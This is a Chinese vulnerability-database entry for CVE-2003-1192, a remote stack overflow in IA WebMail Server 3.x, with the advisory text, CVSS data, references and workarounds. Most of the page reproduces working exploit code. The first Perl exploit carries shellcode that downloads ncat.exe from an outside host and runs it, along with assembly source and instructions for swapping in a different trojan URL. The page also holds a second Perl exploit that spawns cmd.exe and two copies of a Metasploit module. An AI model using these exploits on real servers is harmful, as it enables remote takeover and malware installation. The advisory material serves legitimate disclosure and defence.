CVE-2003-1192
CVSS10.0
发布时间 :2003-11-03 00:00:00
修订时间 :2008-09-05 16:36:17
NMCOEP    

[原文]Stack-based buffer overflow in IA WebMail Server 3.1.0 allows remote attackers to execute arbitrary code via a long GET request.


[CNNVD]IA WebMail Server超长GET请求远程缓冲区溢出漏洞(CNNVD-200311-009)

        
        IA WebMail Server是一款强大的基于WEB的邮件服务程序。
        IA WebMail Server对用户提交的HTTP GET请求缺少充分过滤,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以Webmail进程权限在系统上执行任意指令。
        如果攻击者提交超过1044字节的HTTP GET请求,由于lstrcpya()函数缺少充分的边界缓冲区检查,可触发缓冲区溢出,覆盖堆栈中的返回地址,精心构建提交数据可能以Webmail进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:truenorth_software:ia_webmail_server:3.1
cpe:/a:truenorth_software:ia_webmail_server:3.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1192
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1192
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-009
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/13580
(VENDOR_ADVISORY)  XF  iawebmailserver-get-bo(13580)
http://www.securityfocus.com/bid/8965
(UNKNOWN)  BID  8965
http://www.securiteam.com/windowsntfocus/6B002158UQ.html
(UNKNOWN)  MISC  http://www.securiteam.com/windowsntfocus/6B002158UQ.html
http://www.osvdb.org/2757
(VENDOR_ADVISORY)  OSVDB  2757
http://www.derkeiler.com/Mailing-Lists/VulnWatch/2003-11/0001.html
(UNKNOWN)  VULNWATCH  20031103 IA WebMail Server 3.x Buffer Overflow Vulnerability
http://securitytracker.com/id?1008075
(UNKNOWN)  SECTRACK  1008075
http://secunia.com/advisories/10107
(VENDOR_ADVISORY)  SECUNIA  10107

- 漏洞信息

IA WebMail Server超长GET请求远程缓冲区溢出漏洞
危急 边界条件错误
2003-11-03 00:00:00 2006-08-31 00:00:00
远程  
        
        IA WebMail Server是一款强大的基于WEB的邮件服务程序。
        IA WebMail Server对用户提交的HTTP GET请求缺少充分过滤,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以Webmail进程权限在系统上执行任意指令。
        如果攻击者提交超过1044字节的HTTP GET请求,由于lstrcpya()函数缺少充分的边界缓冲区检查,可触发缓冲区溢出,覆盖堆栈中的返回地址,精心构建提交数据可能以Webmail进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        True North Software
        -------------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.tnsoft.com/webmail.htm

- 漏洞信息 (124)

IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit (EDBID:124)
windows remote
2003-11-19 Verified
80 Peter Winter-Smith
N/A [点击下载]
#!/usr/bin/perl -w
#
# IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit
# Application Specific Shellcode: URL Downloader
#  - www elitehaven net/ncat.exe (downloaded)
#  - c:\nc.exe                          (created)
#
# By Peter Winter-Smith peter4020 hotmail com
# Shellcode included - will need reassembling to use different
# urls and files etc.
#
# Tested against:
#  - Windows XP Home SP1
#  - Windows 2000 Pro SP4
#
# Shellcode should work each time, since it steals it's addresses
# from the iaregdll.dll module import tables.
# Uses a very static jmp esp in iaregdll.dll - Should work on all
# servers without alteration!
#
# If the remote server is running a firewall, the urldownloader
# will be unable to spawn a shell, so for testing I recommend
# that you close the firewalls, or get another shellcode which
# will deal with this. This exploit is for PoC purposes only :o)
#
# Notes:
#  - WebMailsvr.exe exits without consuming 100% resources in most
#    cases.
#  - This has only been tested with IA WebMail 3.1, however it was
#    designed to exploit all versions.



use IO::Socket;

if(!($ARGV[1]))
{
 print "Usage: iawebmail.pl <victim> <port>\n\n";
 exit;
}

$shellcode =            "\x90\xEB\x3C\x5F\x55\x89\xE5\x81" .
                        "\xC4\xE8\xFF\xFF\xFF\x57\x31\xDB" .
                        "\xB3\x07\xB0\xFF\xFC\xF2\xAE\xFE" .
                        "\x47\xFF\xFE\xCB\x80\xFB\x01\x75" .
                        "\xF4\x5F\x57\x8D\x7F\x0B\x57\x8D" .
                        "\x7F\x13\x57\x8D\x7F\x08\x57\x8D" .
                        "\x7F\x23\x57\x8D\x7F\x09\x47\x57" .
                        "\x8D\x54\x24\x14\x52\xEB\x02\xEB" .
                        "\x52\x89\xD6\xFF\x36\xFF\x15\xDC" .
                        "\x51\x02\x10\x5A\x52\x8D\x72\xFC" .
                        "\xFF\x36\x50\xFF\x15\x14\x52\x02" .
                        "\x10\x5A\x52\x31\xC9\x51\x51\x8D" .
                        "\x72\xF0\xFF\x36\x8D\x72\xF4\xFF" .
                        "\x36\x51\xFF\xD0\x5A\x52\xFF\x72" .
                        "\xEC\xFF\x15\xDC\x51\x02\x10\x5A" .
                        "\x52\x8D\x72\xF8\xFF\x36\x50\xFF" .
                        "\x15\x14\x52\x02\x10\x5A\x52\x31" .
                        "\xC9\x41\x51\x8D\x72\xF0\xFF\x36" .
                        "\xFF\xD0\xCC\xE8\x6B\xFF\xFF\xFF" .
                        "\x55\x52\x4C\x4D\x4F\x4E\x2E\x44" .
                        "\x4C\x4C\xFF\x55\x52\x4C\x44\x6F" .
                        "\x77\x6E\x6C\x6F\x61\x64\x54\x6F" .
                        "\x46\x69\x6C\x65\x41\xFF\x57\x69" .
                        "\x6E\x45\x78\x65\x63\xFF\x68\x74" .
                        "\x74\x70\x3A\x2F\x2F\x77\x77\x77" .
                        "\x2E\x65\x6C\x69\x74\x65\x68\x61" .
                        "\x76\x65\x6E\x2E\x6E\x65\x74\x2F" .
                        "\x6E\x63\x61\x74\x2E\x65\x78\x65" .
                        "\xFF\x63\x3A\x5C\x6E\x63\x2E\x65" .
                        "\x78\x65\xFF\x6B\x65\x72\x6E\x65" .
                        "\x6C\x33\x32\x2E\x64\x6C\x6C\xFF";

$victim = IO::Socket::INET->new(Proto=>'tcp',
                                PeerAddr=>$ARGV[0],
                                PeerPort=>$ARGV[1])
                            or die "Unable to connect to $ARGV[0] on port $ARGV[1]";
$ebp = "BBBB";
$eip = "\x33\xBD\x02\x10";
$exploit = "GET /" . "a"x1036 . $ebp . $eip . $shellcode . " HTTP/1.1\n\n";

print $victim $exploit;

print " + Malicious GET request sent ...\n";
print " + Wait a moment now, then connect to $ARGV[0] on port 9999.\n";

sleep(5);

print "Done.\n";

close($victim);
exit;

########################################
##                            SHELLCODE                              #
########################################
# ; IA WebMail 3.x Shellcode (iaregdll.dll version 1.0.0.5)
# ; Url Download + Execute
# ; By Peter Winter-Smith
# ; [peter4020@hotmail.com]
# ;
# ; nasmw -fbin -o iashellcode.s iashellcode.asm
#
# bits 32
# 
# int3
# jmp short killnull
# 
# next:
# pop edi
# 
# push ebp
# mov ebp, esp
# add esp, -24
# 
# push edi
# 
# xor ebx, ebx
# mov bl, 07h
# mov al, 0ffh
# 
# cld
# nullify:
# repne scasb
# inc byte [edi-01h]
# dec bl
# cmp bl, 01h
# jne nullify
# 
# pop edi
# 
# push edi		; 'URLMON.DLL'
# lea edi, [edi+11]
# push edi		; 'URLDownloadToFileA'
# lea edi, [edi+19]
# push edi		; 'WinExec'
# lea edi, [edi+08]
# push edi		; 'http://www.elitehaven.net/ncat.exe'
# lea edi, [edi+35]
# push edi		; 'c:\nc.exe'
# lea edi, [edi+09]
# inc edi
# push edi		; 'kernel32.dll'
# 
# lea edx, [esp+20]
# push edx
# 
# jmp short over
# killnull:
# jmp short data
# over:
# 
# mov esi, edx
# push dword [esi]
# 
# call [100251DCh]	; LoadLibraryA
# 
# pop edx
# push edx
# lea esi, [edx-04]
# push dword [esi]
# 
# push eax
# 
# call [10025214h]	; GetProcAddress(URLMON.DLL, URLDownloadToFileA);
# 
# pop edx
# push edx
# 
# xor ecx, ecx
# push ecx
# push ecx
# lea esi, [edx-16]	; file path
# push dword [esi]
# lea esi, [edx-12]	; url
# push dword [esi]
# push ecx
# 
# call eax
# 
# pop edx
# push edx
# 
# push dword [edx-20]
# 
# call [100251DCh]	; LoadLibraryA
# 
# pop edx
# push edx
# 
# 
# lea esi, [edx-08]
# push dword [esi]	; 'WinExec'
# push eax		; kernel32.dll handle
# 
# call [10025214h]	; GetProcAddress(kernel32.dll, WinExec);
# 
# pop edx
# push edx
# 
# xor ecx, ecx
# inc ecx
# push ecx
# 
# lea esi, [edx-16]	; file path
# push dword [esi]
# 
# call eax
# 
# int3
# 
# 
# data:
# call next
# db 'URLMON.DLL',0ffh
# db 'URLDownloadToFileA',0ffh
# db 'WinExec',0ffh
# db 'http://www.elitehaven.net/ncat.exe',0ffh
# ; When altering, you MUST be sure
# ; to also alter the offsets in the 0ffh to null
# ; byte search!
# ; for example:
# ;   db 'http://www.site.com/someguy/trojan.exe',0ffh
# ; count the length of the url, and add one for the 0ffh byte.
# ; The above url is 38 bytes long, plus one for our null, is 39 bytes.
# ; find the code saying (at the start of the shellcode):
# ;   push edi		; 'http://www.elitehaven.net/ncat.exe'
# ;   lea edi, [edi+35]
# ; and make it:
# ;   push edi		; 'http://www.site.com/someguy/trojan.exe'
# ;   lea edi, [edi+39]
# ; same goes for the filename below :o)
# db 'c:\nc.exe',0ffh
# db 'kernel32.dll',0ffh
#####################################################################

# milw0rm.com [2003-11-19]
		

- 漏洞信息 (16767)

IA WebMail 3.x Buffer Overflow (EDBID:16767)
windows remote
2010-05-09 Verified
80 metasploit
N/A [点击下载]
##
# $Id: ia_webmail.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'IA WebMail 3.x Buffer Overflow',
			'Description'    => %q{
					This exploits a stack buffer overflow in the IA WebMail server.
				This exploit has not been tested against a live system at
				this time.
			},
			'Author'         => [ 'hdm' ],
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2003-1192'],
					[ 'OSVDB', '2757'],
					[ 'BID', '8965'],
					[ 'URL', 'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'BadChars'    => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'IA WebMail 3.x',
						{
							'Ret'    => 0x1002bd33,
							'Length' => 1036
						},
					]
				],
			'DisclosureDate' => 'Nov 3 2003',
			'DefaultTarget'  => 0))
	end

	def exploit
		print_status("Sending request...")

		send_request_raw({
			'uri' =>
				"/" + ("o" * target['Length']) +
				"META" +
				[target.ret].pack('V') +
				payload.encoded
		}, 2)

		handler
	end

end
		

- 漏洞信息 (23334)

IA WebMail Server 3.0/3.1 Long GET Request Buffer Overrun Vulnerability (EDBID:23334)
windows remote
2003-11-03 Verified
0 Peter Winter-Smith
N/A [点击下载]
source: http://www.securityfocus.com/bid/8965/info

IA WebMail Server is said to be prone to a remote buffer overrun that could allow an attacker to execute arbitrary code. The problem occurs due to insufficient bounds checking when handling GET requests. As a result, an attacker may be capable of overrunning the bounds of an internal memory buffer and effectively control the flow of execution. 

#!/usr/bin/perl
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
                                 PeerAddr => $host,
                                 PeerPort => "8180",
                                 );
unless ($remote) { die "cannot connect to http daemon on $host" }

$remote->autoflush(1);

$shellcode = join ("",
"\x90", # - NOP
"\xCC", # - INT3
"\x90", # - NOP
"\x90", # - NOP
"\x90", # - NOP
"\x90", # - NOP
"\x8B\xEC", # - MOV EBP, ESP
"\x55", # - PUSH EBP
"\x8B\xEC", # - MOV EBP, ESP
"\x33\xFF", # - XOR EDI, EDI
"\x57", # - PUSH EDI
"\x83\xEC\x04", # 0 SUB ESP, 4
"\xC6\x45\xF8\x63", # - MOV BYTE PTR SS:[EBP-8],63h
"\xC6\x45\xF9\x6D", # - MOV BYTE PTR SS:[EBP-7],6Dh
"\xC6\x45\xFA\x64", # - MOV BYTE PTR SS:[EBP-6],64h
"\xC6\x45\xFB\x2E", # - MOV BYTE PTR SS:[EBP-5],2Eh
"\xC6\x45\xFC\x65", # - MOV BYTE PTR SS:[EBP-4],65h
"\xC6\x45\xFD\x78", # - MOV BYTE PTR SS:[EBP-3],78h
"\xC6\x45\xFE\x65", # - MOV BYTE PTR SS:[EBP-2],65h
"\xB8\xC3\xAF\x01\x78", # - MOV EAX, MSVCRT.system
"\x50", # - PUSH EAX
"\x8D\x45\xF8", # - LEA EAX, DWORD PTR SS:[EBP-8]
"\x50", # - PUSH EAX
"\xFF\x55\xF4", # - CALL DWORD PTR SS:[EBP-C]
"\x5F" # - POP EDI
);

$eip = "\x4c\xf8\x12";

#0012f84C

#$eip = "AAAA";
$request = join ("", "GET /", $shellcode, "A"x(1040-length($shellcode)),
$eip, " HTTP/1.1\r
Host: $host\r
Connection: close\r
\r
\r\n");

print $remote $request;
sleep(1);

close $remote;

		

- 漏洞信息 (F82938)

IA WebMail 3.x Buffer Overflow (PacketStormID:F82938)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
CVE-2003-1192
[点击下载]

This exploits a stack overflow in the IA WebMail server. This exploit has not been tested against a live system at this time.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'IA WebMail 3.x Buffer Overflow',
			'Description'    => %q{
				This exploits a stack overflow in the IA WebMail server.
				This exploit has not been tested against a live system at
				this time.
					
			},
			'Author'         => [ 'hdm' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2003-1192'],
					[ 'OSVDB', '2757'],
					[ 'BID', '8965'],
					[ 'URL', 'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'BadChars'    => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",

				},
			'Platform'       => 'win',
			'Targets'        => 
				[ 
					[
						'IA WebMail 3.x',
						{
							'Ret'    => 0x1002bd33,
							'Length' => 1036
						},
					]
				],
			'DisclosureDate' => 'Nov 3 2003',
			'DefaultTarget'  => 0))
	end

	def exploit
		print_status("Sending request...")

		send_request_raw({
			'uri' => 
				"/" + ("o" * target['Length']) +
				"META" +
				[target.ret].pack('V') +
				payload.encoded
		}, 2)

		handler
	end

end
    

- 漏洞信息

2757
IA WebMail Server GET Request Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Workaround
Exploit Public, Exploit Commercial

- 漏洞描述

IA Webmail contains a flaw that allows a remote attacker to execute arbitrary code. The issue is due to a boundary error in the web service when handling HTTP GET requests. This can be exploited to cause a buffer overflow by sending an overly long, specially crafted GET request to a vulnerable system, resulting in the attacker being able to execute code remotely.

- 时间线

2003-11-03 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workarounds: 1) Filter long requests in a HTTP proxy or firewall with URL filtering capabilities. 2) Restrict access to the web service (default port 8180/tcp) allowing only trusted IPs to connect

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站